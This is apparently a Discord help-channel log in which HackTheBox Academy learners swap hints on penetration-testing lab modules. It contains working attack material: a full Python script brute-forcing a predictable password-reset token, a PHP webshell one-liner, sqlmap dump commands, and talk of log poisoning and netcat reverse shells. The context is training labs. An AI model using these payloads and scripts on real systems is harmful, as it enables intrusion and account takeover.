Hi can anyone give a small nudge with attacking common services SMB?
Hint here says a password list from the resource. Not sure where it is..
Module : BloodHound
Question : Find the percentage of users with a path to Domain Admin. Submit just the number as your answer (to two decimal points, i.e. 9.78).
Anybody ?
If you're here, you must have an idea already...
That is probably a question you should ask in community help or FAQ, but I think, not here.
ok
Does anyone have any advice for the password attacks: password mutation question? I created the wordlist using the exact command on the page and I entered the right brute force command for the "sam" user, but it doesn't complete fast enough. I even tried using the max 64 threads like some people said, but the machine still runs out of time.
Which service are you targeting? And also try to remove duplicates from the list
Hi in the using Metasploit Framework module, under the sessions section we have this question of privilege escalation
"The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file and submit the contents of it as the answer."
any idea how can I proceed?
I haven't done this module but googling wouldn't help?
I have found things doing that, personally
I am looking but wasn't able to find anything good
the question says that the attack is related to older version of sudo, looked for attacks regarding that found one rapid7, but the meterpreter don't have python command support
question itself suggests to find relevant exploit for this sudo bug, but currently not able to find one
Well, you might have to wait for someone who's done the module already :/
So I've found a few subdomains in the web fuzzing assessment but question 1 won't accept any answers I input, any ideas?
The question asks for all the subdomains.
Literally just inputted them there. Long day
There is a way to figure out the version of sudo that is in use. I don't want to give away the answer but I wouldn't recommend searching "exploits for sudo." You're going to want to figure out the version of sudo and then exploits for that version
I am looking for some help on the east - lab section of the Footprinting module. Could I DM someone?
dm
Looking for some guidance in the 'Vulnerability Assessment' course - Anyone familiar with where the pre-generated reports are located? Thanks!
When you Login on Nessus under My Scans
Hey all! I can't seem to connect to rdp in the module "Active Directory Enumeration and Attacks", section "LLMNR/NBT-NS Poisoning - from Windows". Using xfreerdp /v:10.129.153.168 /u:htb-student /p:'Academy_student_AD!' I get a black screen, then the console gets filled with [WARN][com.freerdp.client.x11] - xf_lock_x11_: [1] recursive lock from xf_process_x_events
vpn on and tried resetting the target.
@rustic sage thanks for the input, I tried sudo -V, that didn't work, I'll try to find with some other method
I just finished the intro module, what module should i go for next?
@rancid holly try using the local_exploit_suggester
Im conflicted between choosing windows fundamentals, getting started or learning process modules
I'd go into learning process, then getting started, then windows fundamentals. A lot of reading, but it will give you a good introduction before diving in the "real" content. (that's also the order I did)
@brisk seal Getting Started is excellent, covers a very wide array of topics, but might be pretty difficult if you are new
Yeah everything in that module is fucked
I'm managing to get on to things with rdesktop for a few seconds at a time then it crashes and refuses to connect with any tools
really disappointing as the content of the module looks great but nothing actually works
can any one throw some light into hashcat module? I'm running out of options to try to crack this hash...
what wordlist and rules did you use?
rockyou wordlist, and rules... well, some of the built-in and some that appeared in the previous pages of the module
also guessing it's MD5, cause hashid is not very confident either
You can also check using hashes.com (and if lucky, it will even identify the password) to identify the hash type. Then, using rockyou, try using the rules in /usr/share/hashcat/rules. One of them should work (it had "common" in it I think)
lol it was on hashes.com, I'm still gonna try to crack it with hashcat haha, thank you
@real hill i believe it's actually an NTLM hash. Feel free to DM if you need help !
Hi everyone. I prefer owasp zap over burp mainly because it's free. However some encoding or not available with fuzz such as full URL encoding (which is not the same as URL encoding).
Do you have any workaround to suggest ?
Hello, do you have any hints for Intergalactic Post challenge? I am 95% sure it's SQL injection but tried hundreds of options how to bypass email or http headers to access the reverse shell via netcat but nothing is working:(
I'm targeting ssh and duplicate passwords were removed with sort -u.
Try ftp if possible is faster... Dm if still isn't fast enough
is this the place to ask for a little help with a module?
im stuck on Attacking Common Services/Attacking SMB
i just dont understand how im supposed to get the password for jason
FTP was faster, thx
If anyone is stuck on the password attacks: password mutation question, brute force FTP instead of SSH. It's faster and you get the same result.
d
anyone who has completed Using Web Proxies module?
I'm really stuck under "proxying tools" section
Sure I can help. Where are you stuck? You can also DM.
I just completed this section so if you need help let me know!
fyi I couldn't get it working in ZAP, and once I used Burp (like the question says) I was able to see what was going on.
Module ACTIVE DIRECTORY ENUMERATION & ATTACKS, Living Off the Land
Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
I use some other easier way to get the flag rather than following the hint
If anyone could give me a nudge about how to reach it by the intend way, please DM me. Thank you!
Hi
I'm still stuck on web requests - crud api
I followed what asked and even after I cannot see any flag
Has anyone completed the Windows Privilege Escalation module? Im stuck on the Responder chapter
I'm still stuck at Linux fundamentals
anyone knows why hashcat gives me errors when cracking the .cap files? There's not much margin for error, I'm following the module guide as is...
I'm getting the same errors in WSL2 and Powershell, lol
for the mode you are using, you can see one example hash with "hashcat --example-hashes | grep -A 14 22000"
Perhaps it doesn't match the lines in the hashfile you are using?
You can mp if you need
DM for assistance
DM if you still have issues or elaborate in the channel for assistance
Hello can someone give me a nudge on SMB in common_services module please?
Would be great to pm
What module, what section? I'm not sure to understand your question.
sure, DM
For people struggling with that part (attacking common services, smb section): crackmapexec doesn't work for some reason. We got it working using msf smb_login brute force tool. An admin should check that or maybe update the module?
You can DM me if you are still stuck at the Metasploit Module.
Need help on ACL Enumeration from Active Directory Enumeration & Attack. Q: What is the ObjectAceType of the first right that the forend user has over the GPO Management group?
I'm at ACL Abuse Primer section. Will get there eventually today if nobody else respond.
Hope you get them all.
dm if you still hang
try to run it in pwnbox
@rustic sage27 - Thank you for the help with the 'Vulnerability Assessment' course.
I'm blocked at the last question. Trying to Get-DomainObjectACL for forend hangs after finding what I can do with user Dagmar... I've seen it in bloodhound, but don't know how to input the answer. Finally output the answer, nevermind!
@wintry gorge try placing the .scf file in Department Shares\Public\IT
our Friday gift to y'all
Oh yeah!!
Hello! Sorry for the noob question! But how do I stop my first machine so I can move to my second? Sorry Im new and doing starter guide
Error!
You must stop your active machine before spawning another one.
The pwn box? Just keep using the same. Or there is a red button "terminate" if you need to close it.
Sorry I don't use pwnbox - I use normal OpenVPN for connection and I completed first task and when I go to 2nd task it says first machine active even tho they say i completed full task
any idea why my OpenVPN is not working
not sure srry, im noob as well to this
I'm not sure I understand what task you are talking of. You got a screenshot?
Is that from you own kali/parrot box?
when i go to task 2 it says
Error!
You must stop your active machine before spawning another one.
Oh, You are not in the right discord. There is a starting point room. But, that just means you did not stop the last box. You can probably see it on top of your screen next to the search bar. Click on it and de-spawn it. Or go back to the last exercise you've done and turn off the machine.
I understand and im sorry for bad place to ask! i mean no harm and let me check pls
no no no, don't worry
hmmm... I'm not sure how to help. Maybe try creating a new openvpn file via the top right menu (with your username), vpn settings.
Hello guys, my website got hacked and I need some help please
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.100 netmask 255.255.254.0 destination 10.10.14.100
inet6 fe80::c8ae:b329:991c:e8f8 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef:2::1062 prefixlen 64 scopeid 0x0<global>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 6 bytes 528 (528.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13 bytes 696 (696.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
how do i terminate?
ty! worked haha, i missed it
sudo killall openvpn worked
#rules
4. Keep it legal.
Do not request, suggest, perform, promote or in other way or shape discuss illegal activities. We respect and follow the Discord ToS as well as the HackTheBox ToS, and do not hesitate escalating matters appropriately, if we deem it necessary. If in doubt, ask a Community Administrator before posting or don't post it at all.
Alright, it's not illegal, I'm just looking for vulnerabilities on my website
Sorry I didn't ask
Hello
Pls I need help with the last section of the SQL injection module
I cant seem to figure out how to get the root flag
The website isnt vulnerable to SQLi
Hey guys, can anyone help me on windows fundamentals skill assessment?
The module??
Nvm just succeeded it!
hello
thanks @mint pagoda but I completed it
What's Up?
Ok I don't even know if I'm doing this correctly. I'm old limited computer knowledge. Started recently. I've completed intro to academy. Learning process and setting up. What would you all recommend for beginner modules. I've got stuck on a few modules bc I didn't understand them. I don't want to use YouTube if I don't have to prefer to learn for myself. I feel YouTube is cheating lol.
Sorry new to discord as well
My advice: Start on any of the Modules of Tier 0 with Fundamental General knowledge.
I am in need of assistance with the Active Subdomain Enumeration section of the Information Gathering - Web Edition module. I need to answer the question "Find and submit the contents of the TXT record as the answer."
I am able to find a list of subdomains, but I am confused as how to properly query for TXT records
I tried to query all of the subdomains for TXT records, but I don't believe they gave me anything I was looking for
@iron tartan DM me
Anyone know why this route is showing as 172.16.4.0? I have it configured for 172.16.5.0.
@west canopy still need an answer or did you figure it out?
@hollow knot I solved it. But there have been around ~5 sections so far I have ran into problems
may I DM you?
sure
I'm having trouble executing the exploit for the first module in "Using the Metasploit Framework". Can anyone help me?
@haughty blade DM me
hi guys, I am doing the active directory enumeration and attacks module, I don't quite understand Access Control Entities.
There is this example in the screenshot.
What does it mean if there is a permission entry with principal Angela Dunn?
Does that mean that the user "forend" allows Angela Dunn to read all properties.. etc,
or
forend is able to read Angela Dunn's properties.. etc?
I am having some problem with htb academy, not able to access the cheat sheet
where can I report it?
Hi Guys, can anyone help me on attacking common service - attacking DNS,I tried brute force with subbrute, dnsenum, subfinder,... but didn't work :(
@rustic sage I'm still stuck under proxying tools, could you give me a hint?
I'm not home at the moment but I'll be back in 1-2 hours if you still need help.
If you copy and paste the commands from the other Metasploit tutorial earlier in the module and use Burp (with intercept on) it should work!
ok., I will do it and let you know if works or not, ty btw
I guess my issue is with proxychains because is not sending packets to Burp, I tested like this, (terminal ran) "proxychains firefox www.ipchicken.com" and firefox was opened and ipchicken reached but nothing happen in my burp, and under my proxychains.conf this lines are set up:
#socks4 127.0.0.1 9050
http 127.0.0.1 8080
https 127.0.0.1 8080
Hey! Can anyone help me with the BROKEN AUTHENTICATION - Skill Assessment. Ive got the user enumeration and have found a user. I also know that the cookie is b64 encoded of the username hash. However, changing the cookie for the user 'su***rt' doesnt do the trick. Am I missing something? Can someone please help me in the right direction please?
working on broken auth and trying to write a python script with very little python experience. if anyone can help dm me
Is anyone facing a problem of logging as victor? Dynamic Port Forwarding with SSH and SOCKS Tunneling
It's pretty much as the example. but I just can't rdp successfully.
Hey @lucid mirage feel free to DM me for help.
Can anyone respond to this as well please or DM me?
hi guys i need to know how do i get root permissions ?
i tried:
getprivs
but didnt work
hello friends I am stuck on module Using Web Proxies and more precisely on exercise Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag. What I am doing on burp intruder is /$admin$/$.html$ with the common.txt list but I only get 404 messages. What am I doing wrong? thank you. Please dm me if you can help me
anyone know why im getting this error
@native ether your Fuzzing is a little bit off. Sec I'll DM you
he forgot to remove it jared i helped him out
but if you want to go down a rabbit hole with me on this script im trying to make for broken auth that would be cool
for predicting the reset token?
ye
oh man, as a python noob that section was a nightmare for me lol
i tried a few today and got frustrating after over an hour of furious error searches and not understand wtf was happening
the whole converting an integer to bytes thing is really confusing
DM me!
@near bolt the username for the support user is actually support.xx , where xx is a country code. Once you find out the valid usernames (there is more than one), you want to filter the rockyou.txt wordlist for passwords that match the complexity requirements
Good Morning! i'm working on the cross-site scripting (XSS) module and tried to launch the target machine for Stored-XSS a few times but i keep getting error "Target failed to spawn". Anyone else running into issues with spawning machines?
yup same issue for me with 2 different modules as well, you can get the target to spawn eventually in my experience so far by refreshing and trying again about 10 times+ or so
ive @'d one of the staff in erratum, you can do the same if you want
Thanks
I'm working through the "Intro to web proxies" academy module, and am having an issue using nmap with the "--proxies" switch
The scan works, but burp doesn't intercept the traffic
burp shows it is indeed listening on 127.0.0.1:8080
curl using proxychains does get intercepted by burp
My nmap command I type:
nmap --proxies http://127.0.0.1:8080 139.59.177.61 -p31669 -sC -sV
in broken authentication module section 'predictable reset token', if anyone knows how to solve the second question please dm me. it looks to me like not enough information is provided to solve
nvm i figured it out
Hey, I need some help on the COMMAND INJECTIONS module - Skills Assessment. Been stuck for hours
@sage jackal dm me
Hello, i am doing the File Inclusion module, section : File Inclusion Prevention and i have a problem finding the answer to that : Edit the php.ini file to block system(), then try to execute PHP Code that uses system. Read the /var/log/apache2/error.log file and fill in the blank: system() has been disabled for ________ reasons.
Since, when i try to write on the file php.ini, it tells me than i am not allow to write... Same when i try to create a shell.php in the /var/www/html. If someone can only tell me it's normal and i have things to do before so i am sure it's not a bug or smt
When doing Linux fundamentals using pwn box tried using a sudo command, noticed it said "htb-student is not in the sudoers file. This incident will be reported." But what's the point of the system saying this will be reported, does it view it as a mistake that htb-student isn't in sudoers file and it will get looked at?
Have you found the param vulnerable to command injection?
@mighty pivot It isn't a HTB thing, it's a Linux thing. The OS, which is often going to be running on a large network with users of various permissions, is keeping track of who tries to do stuff they shouldn't. It's a canned message that basically says "It's been logged that you tried to use a command you aren't authorized for, and the network admin is going to see what you did"
In your case, it means nothing. Ignore it.
That's good to know, thank you for the explanation
Hello guys
Yo.
Who is get certificate cbbh?
Just finished the module, thanks though!
Anyone wanna take a stab at my Burpsuite/nmap/metasploit issue a few post earlier?
ok, maybe its 10 posts ago...
hello
Can't get the KRBTGT Account's NT hash using mimikatz for enumerating and attacking active directory module, child -> parent trusts attack from windows section.
Works on the next exercise with secretsdump.py from linux.
Actually, now I'm stuck at obtaining NTLM hash for the domain admin on the newly owned parent domain. (enumerating and attacking active directory module, child -> parent trusts section attack from linux section)
Hey guys in the getting started module, i understand that I need to scan a specific port and find what service and version its running. Ive done this and found it to be apache 2.4.41. Now I need to find an exploit and am given a few options, like metasploit, searchsploit, etc. How can I know which exploit in metasploit will work with this version without using each one and checking? Can I see which apache versions the exploit works on?
they give a rating to the exploit (excellent , good etc..) try the ones with the best rating first
but how would I know the exploit works with my version
the module probably have a check option
it'll tell u if the target is vulnerable
yea i know this but 1. not every exploit has this and 2. i would have to go through every exploit and check which is tedious and time consuming if there are 100s
be more specific with ur version
to narrow it down
wym
yes
yea i tried, nothing pops up
oh i thought you meant in msfconsole
searchsploit uses exploitdb database right?
yes
wdym
how do you know its in msf
ah so if you were to blind exploit this you wouldnt even know that lol
yep xd
wait but there has to be a way can someone help
dm if you are still stuck
when you are using ssh with a port you have to use the -p parameter. ip:port doesn't work...
resolved the problem by being root
Thought i had something bigger to do, i am so stupid
hello, if anyone finished the shell & payloads module please dm me, stuck on the last question
hi folks!
i'm new to the community. I'm stuck at the USING WEB PROXIES module (Burp Intruder), i can't seem to find the flag file fuzzing with Burp, the task was the following:
"Use Burp Intruder to fuzz for '.html' files under the /admin directory, to find a file containing the flag"
of course the wordlist is immense for the speed of community burp, does anyone have suggestions ?
dm me
Hi guys, I was doing some testing in my internal lab and I need to do an exploit exploiting this CVE -> 2022-21427; I am sure that my MySql server is vulnerable being at version 5.7.37... Unfortunately I can't find any documentation on how to exploit it despite the fact that anyway in the nist references it talks about an easy vulnerability to exploit... Any advice on where to find an explanation on how to perform the exploit?
Hi all can someone give me a nudge on "Weak Bruteforce Protections" section of the "Broken Authentication" module?
https://academy.hackthebox.com/module/80/section/837
I am attempting question 2:
I have tried the following ip addresses so far:
||127.0.0.1, the web application's own public ip address and the public ip address of the ajax.googleapis.com||
Also, I am using the ||SecLists Default-passwords.csv ||wordlist
dm
Hello, would anyone be able to give me a bit of help with the Password Attacks- medium module? I am stuck on the Passwd, Shadow & Opasswd section where it is asking to use the creds for -w to get the creds for root.
in the skill assessment for the hashcat module, after running hashid and hashcat for the kerberos hash, I get a weird output: a different hash from the inputted, what's happening?
Hey guys
Dm
Attacking common services-easy
im really stuck here i have found a valid user but i cant find which service to attack any hint
Dm
Hey y'all, i'm on the attack tuning part of sqlmap essentials and i'm confounded w/ flag6, mainly understanding the prefix hint
I'm stuck on Active Directory enum and attacks skills assessment part I. Anyone available?
@sweet heron sure, where are you stuck?
Quite at the beginning... If I understand right, for kerberoasting , I need to use getuserspns.py with valid creds. So I did a little password spraying and found something. But I only get "No Entries found!" I feel like I'm missing something... GetUserSPNs.py -dc-ip 10.129.202.146 INLANEFREIGHT.LOCAL/redacted
which question is that?
The second one. "Kerberoast an account with the SPN MSSQLSvc/SQL01.inlanefreight.local:1433 and submit the account name as your answer"
Gotcha. I was able to find the account using powerview
Are you still stuck on this? I believe I'm super close to getting the flag, but I just can't get RCE.. Which part are you having troubles with?
@naive ravine This question is tricky. Bruteforcing actually never works. Try just sending a regular HTTP request to the server (with either curl or burpsuite) with the added X-Forwarded-For header. Feel free to DM and i can go into more detail
can somebody please lend a hand with Skills Assessment - File Inclusion
Hi! I'm currently on linux fundamentals, and i'm trying to solve some questions, but i'm unable to understand this question:
What is the path to the htb-student's mail?
I could solve these questions:
Find out the machine hardware name and submit it as the answer.
What is the path to htb-student's home directory?
How can I find the path to htb-students mail?
@kindred rain try running the command: env
Thanks a lot!!!
np
not sure if I'm doing something wrong - I managed to find the access.log file for the File Inclusion Skills Assessment challenge, but I can't get Server Log poisoning to work...
Having this exact issue, were you able to get it done
Dm me
Hi there! Stuck on the "Credential Hunting in Linux" section from "Password Attacks" module. I am on the question "Examine the target and find out the password of the user Will" I accessed kira's ssh account but do I need to find will's password looking on the configs, logs, etc.. files? I am losing my mind looking in files.
Any help with this? - Use what you learned in this section to obtain the flag which is hidden in the environment variables. Answer format: HTB{String} - I have gained shell but there is absolutely nothing there, just /var/www/html/page.php and nothing has anything in them
Network Traffic Analysis Module -> Tcpdump Fundamentals -> 3rd Question is either not working or I dont understand something. Can I DM Someone?
heyo, having a hard time with : What's the contents of table flag4? (Case #4) - sqlmap essentials
Network Traffic Analysis Module -> Tcpdump Fundamentals -> 4th Question should also accept the same answer without sudo imo, since reading only requires the necessary privs to read the file
nevermind I was writing the whole command and not the switches only lol
sqlmap -u http://138.68.188.223:30126/case4.php --data '{"id": 1}' --batch --dump
Worked, but looking at the hint provided it says that I must take a look into -r option.
[10:45:40] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
am I missing something?
[10:48:44] [WARNING] GET parameter 'id' does not seem to be injectable
would it be best to do all the academy modules first and then move on to the htb platform or do modules as I try to do machines?
how can I tell how many different zones there are with this?
i would say academy is more for special learning, example you wanna learn how to privesc on linux because you are struggling on that go for the module.
if you are starting starting start from the starting point
I like to mix it up. Sometimes I feel more like doing challenges, sometimes more like learning/reviewing something in depth
same ^ doing only academy is boring
You have to query the individual subdomains with dig AXFR or with dig www.subdomain.domain.tld, dig ns.subdomain.domain.tld, dig ns01.subdomain.domain.tld, dig mail.subdomain.domain.tld, etc. You can use scripts or software to do this. But start with a small list of hosts.
If dig AXFR returns a corresponding answer or you get an IP address back with your dig queries, then it is a zone.
wow nice, I understand it now, thank you
So that you don't have to query every subdomain, most of which will be hosts anyway, it makes sense to think about which subdomain might be a zone.
For example, www or even ns will be a server (host) in most cases and not a zone.
Zones are usually departments in a company.
Any tips how can I find flag hidden in environment variables after getting shell ?
@rustic sage hi, i am having the same issue, any hint ?
nvm, i found the answer
well it was working, but now it's not, i really don't know, i did not change anything....
I think skill assessment file inclusion module is literally full of bugs
try to env and grep what you want
Okay I got the flag, but holy shit I had to work for it, grepping doesn't work and the file location is completely wack, can someone explain me easier way than: searching through the entire space for the word HTB{*, then copy pasting the entire file to a notepad and searching for the correct word, does not seem right. | grepping for the word from the file does not work
If you are referring to the SSTI Exploitation Example 1 question, DM me and I will show you the way
need help with file upload module DM me plx
With whom should I be in contact considering I only got 10/20 cubes from the tunneling/portfwd etc course?
not that it matters much since I only need T3+ courses but still
For the Privileged Access section of the AD Enumeration and Attacks module, I am having trouble with the third question: "Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt." The hint says to do this with mssqlclient.py which is an impacket tool yet the attack machine is a windows box. Can anyone help?
Hey guys/
Server-side Attacks
SSTI Exploitation Example 1
A bit confused on executing this task, I cannot dump the template environment/ does this mean cat the proc/self/environ?
no. Check out the part in that section about curl
@hollow knot Isn't that standard? Spend 100 cubes and get 20 back upon completion?
@tiny ledge which module/section is that? Running cat on a Binary won't work (because of ascii data vs binary data)
yeah but I got only 10
it was first listed as 10 cubes back then it got increased to the default 20%
So, i am still stuck on the File Inclusion module any hint would be amazing. || I already found the "panel", i tried to do log poisoning on access.log, error.log, every /proc/ i found. Around 11. i also tried /var/log/sshd.log
/var/log/mail
/var/log/vsftpd.log , I also tried php session poisoning without success since no php_session file. I also tried to upload a file from the ?message= ... Without success. I tried doing a server in python http, smb, ftp || just need someone to evaluate if probably did something wrong or if i need to check further
Still not getting anywhere
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Has anyone completed the File Inclusion Skills Assessment here? I'm really close and on the last step, but I just need a hint.
Hi all, I'm a bit stuck with the Basic Bypasses of File Inclusion. Even though I understand the hint posted at the question, I'm only getting the message: Illegal path specified!
I can help with that, let me take a look
DM me
DM me
dm me
Has anyone completed the windows fundamentals Skills Assessment here? I'm really close and on the last step, but I just need a hint.
Hello
On pivoting module
proxychains xfreerdp /u:victor /p:pass@123 /v:172.16.5.19 ==> logon failure ?
But with -a I get all the text in the file, It's Server-Side Attacks | SSTI Exploitation Example 1
that question uses curl
Dm :)
can you provide more details ?
@lofty pollen Which question? Looking for the SID of the HR security group?
Yeah
@lofty pollen try this command from powershell: (Get-Localgroup HR).SID
We are a couple of users who did not get a hit on the right password using crackmapexec tool. We got it working with a metasploit module for smb_login. DM for more details and/or screenshots.
@upper niche I found the answer, sk4reKr0w helped me
Okay
Anybody know how to do Knowledge Check part of getting started module? Or have resources for it?
@turbid hull The last part of the module, Knowledge Check. It is a box you have to try your knowledge out on. A bit stuck on it.
@iron basin for the initial foothold, try using metasploit to look for an exploit against GetSimpleCMS. For the privilege escalation it's a GTFObin
@west canopy yeah I got the exploit to work. Got meterpreter working but trying to get it to connect to another way so I have a better shell
Well I got the user.txt
has anyone done Perform a DCSync attack and submit the NTLM hash for the khartsfield user as your answer.
does anyone know how to have wfuzz fuzz multiple things? like if i wanted to fuzz <filename>.<extension>
and i have two separate wordlists
or is there a better tool for that
@iron basin from meterpreter, you can drop into a regular OS shell with the command: shell
Hello everyone. I am new to Linux, so I am learning about stderr, stdin, etc. My teacher asked me what the actual path was for dev/stderr.
It's actually very confusing because I always assumed that /dev/stderr was a child of the "/" folder, and so the actual path to stderr was /dev/stderr.
You can set up 2 keywords
They talk about that in the ffuf htb academy course
Windows Privilege Escalation, Communication with Processes: I can't find the answer of question two on what account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01. NT\Service or MSSQL are not valid answers... I'm not sure I understand.
@sweet heron
I see! Thanks!
hey in getting started module
im in the nibble initial foothold section and managed to get reverse shell but there is no user.txt file to give me the flag
I tried it with two ways, using a metasploit module and doing manually but both ways I just have the db.xml file and if I upload a script, the file of that. there is no user.txt file
and I did try resetting the machine as well
maybe try: find / -iname user.txt 2>/dev/null
its cool in meterpreter too right?
maybe type shell first
LFi module stuck here
how im supposed to read the flag located at /
if its owned by root n im not in localnet
@shut bronze the flag is that super long .txt file, all users have read permission so we should be able to cat it
thanks bro it found it. Turns out was just in another directory. that command literally just searches for the file on the system and writes errors to trash right?
datz right
but it has to be the same exact name user.txt
Has anyone finished attacking common services module here?
whats that?
yeah it works ty
is the pivoting module broken? The given credentials victor:pass@123 does not work with the dc.
I am at netsh section
Hi everyone i'm having this error someone had the same issue with Pivoting module section: RDP and Socks Tunneling?
When I tried to run : regsvr32.exe SocksOverRDP-Plugin.dll shows me an error regarding may not be compatible and I download x64 version and send to the machine
has anyone recently solved lfi module skill assessment
I am at the poisoning step, I can see the logs being poisoned when trying with a sample text, but when I pass the shell code it doesn't work
don't know what I am doing wrong, or is the problem related to box
Hey hackers. I'm going through the Active Subdomain Enumeration section of Information Gathering - Web Edition module, and I'm a bit puzzled by those questions there. I.e. how can I check the FQDN of the nameserver for the inlanefreight.htb, if it doesn't resolve to anything. I guessed it is ns.inlanefreight.htb but it won't help me with the next questions. I'm using the spawnbox.
Can someone give me an answer for "What addressing mechanism is used at the Link Layer of the TCP/IP model?". I've bruteforced any format of "MAC Addressing" answer but no luck
answer should be MAC Address
it keeps telling me it's wrong
Any Headsup for the server side attacks skills assessment, I'm not sure how to start it, cant find anything with curl and can't get the shell
Does anyone know where i can contact someone that i could update the web requests module? It seems that the Server, which is supposed to contact from the questions changed its Apache version. So if i do a simple GET request to the server, it will tell me that the current version is 2.4.29, while the correct answer is 2.4.42 (found that out through the picture used in the explaining part)
I dm you regarding this one. @acoustic owl
Is it me or is the attacking common services RDP is abnormally slow
I think, Yes
):
I'd need a nudge on windows lpe module skills exam part 1 why my exploit won't work
Morning, I think I put this in the wrong chat before but Im a little confused on how to find user 5 in the SQL injection module
I keep getting in but it keeps coming up admin and no flag
It's been 2 days. Just a hint, maybe look at my commands to further assist
Has anyone done command injections module recently? I'm going back through revising my notes, but on the other injection operators question. I don't get the same result as I did the first time I submitted my answer.
they changed some answers in some modules
I've asked the support team before
I was able to figure it out
@hollow knot When i went through the module I ended up using an exe version of PrintNightmare, but i have had a few people tell me it did not work for them. There is however a version of juicypotato that should work. I will DM you
@snow coyote maybe try messaging the author 21y4d. I reported a somewhat similar issue on a different module , it seems there is sometimes variations depending on the docker container of the spawned target
Major Spoilers!
If anyone is having major issues in the "Broken Authentication" Module, "Predictable Reset Token" section, question 1, the following modified script should help you solve this question. I shared it because it is one of the toughest questions that I have faced so far, from the content that I did so far. Hope this helps.
||--------------------------------------------------------- Start of Python Script ---------------------------------------------------------
#!/usr/bin/python3
from hashlib import md5
import requests
from sys import exit
from time import time
# Change the url to your target / victim
url = "http://<ip-address>:<service-port>/question1/"
# To have a wide window try to bruteforce starting from 1050 seconds ago till 1050 seconds after.
# Change now and username variables as needed. IMPORTANT! the value for now has to be epoch time
# stamp in milliseconds, example 1654627487000 and not epoch timestamp, example 1654627487.
now = 1654627487000
start_time = now - 1050
end_time = now + 1050
fail_text = "Wrong token"
username = "htbadmin"
# loop from start_time to end_time. + 1 is needed because of how range() works
for x in range(start_time, end_time + 1):
    # get token md5
    timestamp = str(x)
    md5_token = md5((username + timestamp).encode()).hexdigest()
    data = {
        "submit": "check",
        "token": md5_token
    }
    print("checking {} {}".format(str(x), md5_token))
    # send the request
    res = requests.post(url, data=data)
    # response text check
    if fail_text not in res.text:
        print(res.text)
        print("[*] Congratulations! raw reply printed before")
        exit()
---------------------------------------------------------- End of Python Script ----------------------------------------------------------||
Will look into it
@naive ravine As a python noob, that section kicked my butt lol
Yo guys
Anybody who has solved the skills assessment of "Cracking passwords with hashcat"
I am solving the very last question, and I'm pretty sure my answer is correct as of now (until proven wrong) ,
But its actually incorrect
I wanna discuss that
Oh god I just did it

Hi everyone, I could use some help with the File Upload Attacks: Whitelist Filters exercise. Using Burp Intruder and the extensions.lst word-list from PayloadAllTheThings, I've found 3 extensions that returned a "File Successfully Uploaded" response from the Intruder attack to find extensions that will bypass the site's file extension filters. I also modified the file's content to include the webshell <?php system($_REQUEST['cmd']); ?>
However, when I try to browse to the file that had the valid extensions, the response always returns "Not Found"
Why is Burp Intruder telling me that the file is successfully uploaded but I can never find it when I browse to it?
Windows Privilege Escalation, Server Operators' section. Hmm.. how do you access that flag? The hack worked, but access is still denied.
@sweet heron i ended up using wmiexec.py and passed the hash for the administrator user
Thanks! We're lucky to have you!
hey someone could give me a hint on the Footprinting Lab-Hard, I'm stuck.
I have used ssh private key to log into the host, but I can't find any info about htb account
Can anyone give me a little hint on how to get the second question for Web Service & API Attacks - Information Disclosure (with a twist of SQLi)?
Identify the username of the user that has a position of 736373 through SQLi. Submit it as your answer.
None of the "Classic SQLi payloads" I try returns anything of value..
Can someone help me figure out how to complete the Broken Authentication Module - Weak Bruteforce Protections Section? I can't figure out how to bruteforce the usernames and passwords while also including this header on requests. Can't make the included python script to work
I've tried instead of using the included script to use Hydra but not sure if I've sent the request correctly with the X-Forwarded-For header cause it didn't seem to work.
@stable sparrow have you tried using SQLMap?
@sage jackal one sec I will DM you
I've tried using SQLmap, but it keeps failing as "theres a possibility that the target is dropping 'suspicious' requests".. not sure how to get this working..
@thick raptor after you SSH into the target, try connecting to the mysql database
I solved the problem, thanks for the tip
Hey there. If someone could point me in the right direction regarding the Broken Authentication Module - Weak Bruteforce Protections. I've altered the python bruteforce script to bypass the rate limiting and have so far tried thousands of user:pass combinations. None of them seem to work however..
Hello, I have a noob question:D I am struggling a little bit with SQL injection on HTB challenge.... what is the easiest way to run netcat for reverse shell here, is it possible?
public function subscribeUser($ip_address, $email)
{
    return $this->db->exec("INSERT INTO subscribers (ip_address, email) VALUES('$ip_address', '$email')");
}
Injection could be done via $ip_address (from http header), thanks for any hints
Hi can someone give me an on Broken Authentication - Skill Assessment ? I have found the encoding algorithm for the cookie and login as admin user (only via burp otherwise i get redirected because not enough privileges) but from here i do not know what to do. I have also tried to bruteforce the password of the admin user following the policy password and rockyou.txt with no success... any hint?
this is the filter for the passwords used ||grep '^[[:upper:]]' rockyou.txt | grep '[[:digit:]]$' | grep "[[:punct:]]" | grep -E '^.{20,}$'||
hello where is the general chat ??
in #welcome
hey can someone give me a nudge? I am stuck on the last part of the Linux Privilege Escalation module
"Use the privileged group rights of the secaudit user to locate a flag."
secaudit is in the adm group?
@distant stream Hey! I have the same issue. I can't see any port with FTP (Attacking Common Application/Attacking FTP)
Scan all ports …
I do. Can I DM you?
Sure
I helped someone and we both found out the DNS section of that module could be buggy and it may be impossible to find the subdomain that have the flag if that subdomain isn't in the hosts file already
How did you resolve this?
i didn't, i just give that person the subdomain so keep that in mind when you are doing that part
What subdomain though? Are we suppose to "find" this?
that is a big spoiler but if you are using the subdomains-top1million-110000.txt wordlist you should find all of the subdomain ||in the top 1000||
On command injections advanced command obfuscation why is it when I input the example , a base64 encoded command 'cat /etc/passwd | grep 33' the command works, but if I try the doing 'ls /usr/share | grep' I immediately get an error? Is this because there is a filter blocking that specific string? Am very confused
in the command 'ls /usr/share | grep' you need to specify what you are grepping
